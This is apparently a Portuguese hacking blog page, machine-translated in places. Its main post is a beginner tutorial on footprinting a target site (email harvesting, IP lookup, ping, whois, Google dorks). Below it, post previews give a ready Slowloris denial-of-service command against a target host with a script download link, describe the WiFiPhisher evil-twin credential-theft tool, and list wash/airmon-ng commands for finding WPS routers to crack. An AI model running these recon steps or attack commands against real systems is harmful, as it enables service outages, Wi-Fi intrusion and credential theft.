Pular para o conteúdo principal

Tutorial - Noções básicas de Footprinting

O que é isso ?

Footprinting é o ato que é realizado para reunir informações sobre um sistema de computador. Este é o primeiro passo no processo de hacking ético. Isto irá permitir-nos aprender tudo possível sobre o sistema antes de avançar.

Maneiras de coletar informações

1. As primeiras coisas para tentar encontrar seria e-mails e nomes no site de destino. Se um atacante deseja tentar realizar um ataque de engenharia social, então esta informação será muito útil.

2. O próximo passo é obter o endereço IP do site. Existe muitos sites que permitem que você insira uma URL do site e ele vai te mostrar o IP. Um site que eu costumo usar é : http://www.yougetsignal.com/tools/web-sites-on-web-server/
Como você pode ver acima neste site também irá mostrar todos os outros sites no mesmo servidor web, porem nesse ip existe apenas 2.

3. O terceiro passo é fazer o ping do servidor para se certificar de que está ON. Usando um site como o http://cloudmonitor.ca.com/en/ping.php podemos pingar o site a partir de 34 locais diferentes. Se todos os pacotes passam , o servidor é para ON.

4. O próximo passo é a realização de uma pesquisa de whois no site. Um bom site para isso é whois.domaintools.com, pois dá uma enorme quantidade de informações sobre a empresa, incluindo e-mails, endereços, nomes, etc.(não postarei screenshot para não expor dados de terceiros).

5. E agora  passo final, também tornar-se mais valioso o suode motores de busca para recolher a informação. Como um exemplo, você poderia usar seguinte DORK para procurar todas as páginas que o Google tem listados para um determinado site.

Segue Código:

 site:targetsite.com email  
Outra pesquisa seria encontrar o arquivo robots.txt para encontrar todos os diretórios / páginas que eles desejam manter anônimas.
 inurl:robots.txt  
Bem, isso é o básico, espero que tenham gostado.

Comentários

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p